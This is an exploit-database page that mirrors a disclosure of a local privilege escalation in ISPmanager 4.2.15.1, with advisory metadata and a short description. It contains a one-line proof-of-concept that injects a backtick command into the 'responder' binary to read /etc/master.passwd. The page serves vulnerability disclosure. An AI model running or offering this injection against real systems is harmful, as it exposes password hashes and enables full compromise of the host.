header-logo
Suggest Exploit
vendor:
ISPmanager
by:
Unknown
7.5
CVSS
HIGH
Local Privilege Escalation
Unknown
CWE
Product Name: ISPmanager
Affected Version From: ISPmanager 4.2.15.1
Affected Version To: Unknown (potentially all versions)
Patch Exists: NO
Related CWE: Unknown
CPE: a:ispmanager:ispmanager:4.2.15.1
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Local Privilege Escalation in ISPmanager

The vulnerability allows a local attacker to gain elevated privileges on the affected computer by exploiting a flaw in ISPmanager. By executing a specific command, the attacker can access sensitive information and compromise the affected computer.

Mitigation:

No known mitigation or remediation is available at this time.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26503/info

ISPmanager is prone to a local privilege-escalation vulnerability.

A local attacker can exploit this issue to gain elevated privileges on the affected computer. A successful exploit will lead to the complete compromise of the affected computer.

ISPmanager 4.2.15.1 is reported vulnerable; other versions may be affected as well.

/usr/local/ispmgr/sbin/responder /tmp/ '` cat /etc/master.passwd1>&2 `' 2>&1

Navigation

Suggest Exploit

Services By CQR